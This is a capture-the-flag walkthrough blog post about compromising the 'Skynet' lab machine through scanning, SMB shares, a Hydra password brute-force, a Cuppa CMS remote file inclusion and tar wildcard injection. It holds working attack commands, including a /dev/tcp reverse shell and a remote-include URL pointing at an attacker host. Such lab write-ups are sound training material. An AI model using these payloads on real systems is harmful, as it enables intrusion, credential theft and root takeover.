BLOG

$ nmap -p1-65535 10.10.200.150 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 19:07 IST
Initiating Ping Scan at 19:07
Scanning 10.10.200.150 [2 ports]
Completed Ping Scan at 19:07, 0.36s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:07
Completed Parallel DNS resolution of 1 host. at 19:07, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:07
Scanning 10.10.200.150 [6 ports]
Discovered open port 445/tcp on 10.10.200.150
Discovered open port 22/tcp on 10.10.200.150
Discovered open port 80/tcp on 10.10.200.150
Discovered open port 143/tcp on 10.10.200.150
Discovered open port 139/tcp on 10.10.200.150
Discovered open port 110/tcp on 10.10.200.150
Completed Connect Scan at 19:07, 0.37s elapsed (6 total ports)
Nmap scan report for 10.10.200.150
Host is up, received syn-ack (0.37s latency).
Scanned at 2021-07-03 19:07:27 IST for 1s

PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack
80/tcp  open  http         syn-ack
110/tcp open  pop3         syn-ack
139/tcp open  netbios-ssn  syn-ack
143/tcp open  imap         syn-ack
445/tcp open  microsoft-ds syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.79 seconds
$ nmap -sV -sC -p22,80,110,139,143,445 10.10.200.150
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 19:09 IST
Nmap scan report for 10.10.200.150
Host is up (0.37s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP CAPA SASL PIPELINING RESP-CODES UIDL AUTH-RESP-CODE
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: ID SASL-IR capabilities IMAP4rev1 OK LITERAL+ post-login have ENABLE LOGINDISABLEDA0001 listed LOGIN-REFERRALS more Pre-login IDLE
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2021-07-03T08:39:37-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-07-03T13:39:37
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.92 seconds

Username Enumeration - CVE-2016-6210

Local Privilege Escalation - CVE-2019-0211

Home page didn’t have anything useful and there are no input forms. The Search bar is not processing anything on backend

Homepage

Let’s fuzz for directories

$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ  -u http://10.10.200.150/FUZZ -e .php,.html,.txt,.phtml,.php5,.php3 -ic -t 150

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.200.150/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .html .txt .phtml .php5 .php3
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 150
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

.html                   [Status: 403, Size: 278, Words: 20, Lines: 10]
                        [Status: 200, Size: 523, Words: 26, Lines: 19]
.php                    [Status: 403, Size: 278, Words: 20, Lines: 10]
.phtml                  [Status: 403, Size: 278, Words: 20, Lines: 10]
.php3                   [Status: 403, Size: 278, Words: 20, Lines: 10]
.php5                   [Status: 403, Size: 278, Words: 20, Lines: 10]
index.html              [Status: 200, Size: 523, Words: 26, Lines: 19]
admin                   [Status: 301, Size: 314, Words: 20, Lines: 10]
css                     [Status: 301, Size: 312, Words: 20, Lines: 10]
js                      [Status: 301, Size: 311, Words: 20, Lines: 10]
config                  [Status: 301, Size: 315, Words: 20, Lines: 10]
ai                      [Status: 301, Size: 311, Words: 20, Lines: 10]
squirrelmail            [Status: 301, Size: 321, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10]
:: Progress: [1543829/1543829] :: Job [1/1] :: 364 req/sec :: Duration: [1:07:47] :: Errors: 46 ::

When we navigate to directories discovered by ffuf most of them shows permissions denied error

squirrelmail directory greets us with login page

squirrellogin

No Juicy Information on pop3 and imap

$ nc -nv 10.10.200.150 110
(UNKNOWN) [10.10.200.150] 110 (pop3) open
+OK Dovecot ready.
LIST
-ERR Unknown command.
CAPA
+OK
CAPA
TOP
UIDL
RESP-CODES
PIPELINING
AUTH-RESP-CODE
SASL
.
USER root
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.


$ nc -nv 10.10.200.150 143
(UNKNOWN) [10.10.200.150] 143 (imap2) open
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LOGINDISABLED] Dovecot ready.

Samba has enabled smb version1

$ nmap -p139 --script smb-protocols 10.10.200.150
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 20:09 IST
Nmap scan report for 10.10.200.150
Host is up (0.38s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn

Host script results:
| smb-protocols:
|   dialects:
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2.02
|     2.10
|     3.00
|     3.02
|_    3.11

Nmap done: 1 IP address (1 host up) scanned in 8.16 seconds

Let check the shares in samba

$ smbmap -H 10.10.200.150
[+] Guest session       IP: 10.10.200.150:445   Name: 10.10.200.150
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        anonymous                                               READ ONLY       Skynet Anonymous Share
        milesdyson                                              NO ACCESS       Miles Dyson Personal Share
        IPC$                                                    NO ACCESS       IPC Service (skynet server (Samba, Ubuntu))

we have two shares anonymous and milesdyson.

Let’s try to connect on both of them and obtain any information

$ smbclient  \\\\10.10.200.150\\anonymous -U anonymous
Enter WORKGROUP\anonymous's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Nov 26 21:34:00 2020
  ..                                  D        0  Tue Sep 17 12:50:17 2019
  attention.txt                       N      163  Wed Sep 18 08:34:59 2019
  logs                                D        0  Wed Sep 18 10:12:16 2019

                9204224 blocks of size 1024. 5526764 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> dir
  .                                   D        0  Wed Sep 18 10:12:16 2019
  ..                                  D        0  Thu Nov 26 21:34:00 2020
  log2.txt                            N        0  Wed Sep 18 10:12:13 2019
  log1.txt                            N      471  Wed Sep 18 10:11:59 2019
  log3.txt                            N        0  Wed Sep 18 10:12:16 2019
get log
                9204224 blocks of size 1024. 5526828 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (0.3 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \logs\> get log2.txt
getting file \logs\log2.txt of size 0 as log2.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \logs\> get log3.txt
getting file \logs\log3.txt of size 0 as log3.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \logs\> exit

$ smbclient \\\\10.10.200.150\\milesdyson -U milesdyson
Enter WORKGROUP\milesdyson's password:
session setup failed: NT_STATUS_LOGON_FAILURE

Let check the files, we got from anonymous share

$ cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

$ cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
[...snip...]

$ cat log2.txt

$ cat log3.txt

By using the details provided in anonymous share lets try to bruteforce squirrelmail login page using milesdyson as username and values in log1.txt as passwords.

Using burp for obtaining the password.

intruder.png

Using Hydra

$ hydra -l milesdyson -P /home/user/log1.txt 10.10.200.150 http-form-post '/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodect_results=1&just_logged_in=1:Unknown user or password incorrect.' -I
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-03 21:22:43
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.200.150:80/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.200.150   login: milesdyson   password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-03 21:22:55

Username: milesdyson Password: cyborg007haloterminator

when we try to login using the credentials on login page. we will be greeted with inbox of milesdyson

milesinbox

One of the mail has password for samba share

sambapass

Password: )s{A&2Z=F^n_E.B`

Let’s use the password for login to samba share

$ smbclient \\\\10.10.200.150\\milesdyson -U milesdyson
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Sep 17 14:35:47 2019
  ..                                  D        0  Wed Sep 18 09:21:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 14:35:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 14:35:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 14:35:14 2019
  notes                               D        0  Tue Sep 17 14:48:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 14:35:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 14:35:14 2019

                9204224 blocks of size 1024. 5526612 blocks available
smb: \> cd notes
smb: \notes\> dir
  .                                   D        0  Tue Sep 17 14:48:40 2019
  ..                                  D        0  Tue Sep 17 14:35:47 2019
  3.01 Search.md                      N    65601  Tue Sep 17 14:31:29 2019
  4.01 Agent-Based Models.md          N     5683  Tue Sep 17 14:31:29 2019
  2.08 In Practice.md                 N     7949  Tue Sep 17 14:31:29 2019
  0.00 Cover.md                       N     3114  Tue Sep 17 14:31:29 2019
  1.02 Linear Algebra.md              N    70314  Tue Sep 17 14:31:29 2019
  important.txt                       N      117  Tue Sep 17 14:48:39 2019
  6.01 pandas.md                      N     9221  Tue Sep 17 14:31:29 2019
  3.00 Artificial Intelligence.md      N       33  Tue Sep 17 14:31:29 2019
  2.01 Overview.md                    N     1165  Tue Sep 17 14:31:29 2019
 
 [...snip...]
 
  1.00 Foundations.md                 N       22  Tue Sep 17 14:31:29 2019

                9204224 blocks of size 1024. 5526612 blocks available
smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \notes\>

From all the files in share important.txt stands out. Lets check it

$ cat important.txt

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

There is /45kra24zxs28v3yd directory for adding features. When we navigate to the page. There is nothing much

hiddendirhome.png

let’s fuzz for directories

$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://10.10.200.150/45kra24zxs28v3yd/FUZZ -ic -e .php,.txt,.php3,.php5,.phtml,.txt -t 200

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.200.150/45kra24zxs28v3yd/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
 :: Extensions       : .php .txt .php3 .php5 .phtml .txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

administrator           [Status: 301, Size: 339, Words: 20, Lines: 10]

we got the directory administrator by fuzzing.

On navigating to the directory. we are greeted with cuppa cms login. Previously obtained credentials,didn’t helped on getting the access.

cuppacms


By searching for public exploits on cuppa, there is remote file inclusion vulnerability in it

$ searchsploit cuppa
----------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                       |  Path
----------------------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion                                      | php/webapps/25971.txt
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ cat /usr/share/exploitdb/exploits/php/webapps/25971.txt


####################################
VULNERABILITY: PHP CODE INJECTION
####################################

/alerts/alertConfigField.php (LINE: 22)

-----------------------------------------------------------------------------
LINE 22:
        <?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------


#####################################################
DESCRIPTION
#####################################################

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.

http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]

#####################################################
EXPLOIT
#####################################################

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Moreover, We could access Configuration.php source code via PHPStream

For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------

Using the File inclusion technique to gain initial access

$ curl http://10.10.200.150/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php\?urlConfig\=http://<ip>:8991/php-reverse-shell.php

Getting user flag

usertxt

Spawning a tty

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@skynet:/$ ^Z
[1]  + 7087 suspended  nc -nlvp 8989

$ stty raw -echo; fg
[1]  + 7087 continued  nc -nlvp 8989

www-data@skynet:/$ pwd
/

Lets check for PrivEsc Techniques

After checking with various techniques, in the crontab there is script running with root privileges by every minute.

crontar

Using tar and wilcard injection to escalate our Privileges

www-data@skynet:/$ 
www-data@skynet:/$ cd /var/www/html
www-data@skynet:/var/www/html$printf '#!/bin/bash\nbash -i >& /dev/tcp/<ip>/8585 0>&1\n' > rev.sh
www-data@skynet:/$ touch /var/www/html/--checkpoint-action=exec=bash\ rev.sh
www-data@skynet:/$ touch /var/www/html/--checkpoint=1

Getting root flag

roottxt